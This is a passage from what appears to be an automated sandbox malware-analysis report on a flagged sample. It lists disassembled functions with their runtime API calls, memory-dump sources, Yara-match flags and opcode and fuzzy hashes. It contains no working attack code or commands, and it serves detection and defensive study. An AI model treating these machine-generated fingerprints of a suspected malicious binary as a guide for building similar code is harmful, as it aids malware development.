                                                                                                                                                                                                                                            • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                            Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pScheduler
                                                                                                                                                                                                                                            • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                            • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                            • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                            Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pContext
                                                                                                                                                                                                                                            • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                            • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                            • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                            Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                            • String ID: B
                                                                                                                                                                                                                                            • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                            • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                            • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                            Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pScheduler$version
                                                                                                                                                                                                                                            • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                            • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                            • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                            Function 024C5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                            • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                            • Instruction ID: 359585f543fb61817e44aa8209f9bb017510ec38934e65a20ff6745d2fe46f3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65A158799007869FD762CF1CC8907AEBBE1EF55310F6481AFD485AB381D334A941CB50
                                                                                                                                                                                                                                            Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                            • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                            • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                            Function 024CFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                            • Instruction ID: 7822b99a991e891080caa40178be8f32a52878d3b8da4d556e7df8e5e7ee9766
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8412B396005016BDBA56FBDCC44AEF3A6BEF41730F360A1FF41A96690DB7C44458AB1
                                                                                                                                                                                                                                            Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                            • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                                                                                                                                                            Function 024C6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024C047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024C6B51
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024C6BDA
                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024C6BEC
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 024C6BF5
                                                                                                                                                                                                                                              • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2652629310-0
                                                                                                                                                                                                                                            • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                            • Instruction ID: 9d6383ef1c9bff20e68e007ce20f42b9f6b1676b018dced11cf4e67b4ca5493e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E031F436A0021AABDF25CF69CC40DAF7BA9EF84714F16826EEC04D7250EB35D951CB90
                                                                                                                                                                                                                                            Function 0249D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                                                                            • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                            • Instruction ID: 4b208051555370009853c9382d1ac5e2f7cdeb4b72fb4f6fa46d924a994ee6e6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70213E76E00619AFDF04EFA5DC819BEBBB9EF49714F10006AE505A7290D775AD01CFA0
                                                                                                                                                                                                                                            Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                                                                            • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                            • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                                                                                                                                                            Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                              • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2630251706-0
                                                                                                                                                                                                                                            • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                            • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                                                                                                                                                            Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                                                                                                                                                            • UpdateWindow.USER32 ref: 00401FB7
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1339878773-0
                                                                                                                                                                                                                                            • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                            • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                            Function 024B9330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 024B934A
                                                                                                                                                                                                                                              • Part of subcall function 024B9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024B92C6
                                                                                                                                                                                                                                              • Part of subcall function 024B9297: ___AdjustPointer.LIBCMT ref: 024B92E1
                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 024B935F
                                                                                                                                                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024B9370
                                                                                                                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 024B9398
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 737400349-0
                                                                                                                                                                                                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                            • Instruction ID: 28681ba3d8e0ef8aa481e3ad18e185457c2db1351c87df434b1823a2a6d0915f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96011732500148BBCF125EA6CC40EEB3F6AEF48754F054419FE5896120D376E861AFB0
                                                                                                                                                                                                                                            Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                              • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                              • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 737400349-0
                                                                                                                                                                                                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                            • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                            Function 024C5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378), ref: 024C51C8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024C2213), ref: 024C51D4
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024C51E2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                            • Instruction ID: c05e4e793d37aab7a09084e07b295d753bb2f2775b30038cc04b733b28b8915c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F601FC3EA022226BC7614F6D9C48E5F7B98AF46F617700639F905F7340CB20E541CAE4
                                                                                                                                                                                                                                            Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                            • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                            Function 024B6395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024B63AF
                                                                                                                                                                                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024B63C3
                                                                                                                                                                                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024B63DB
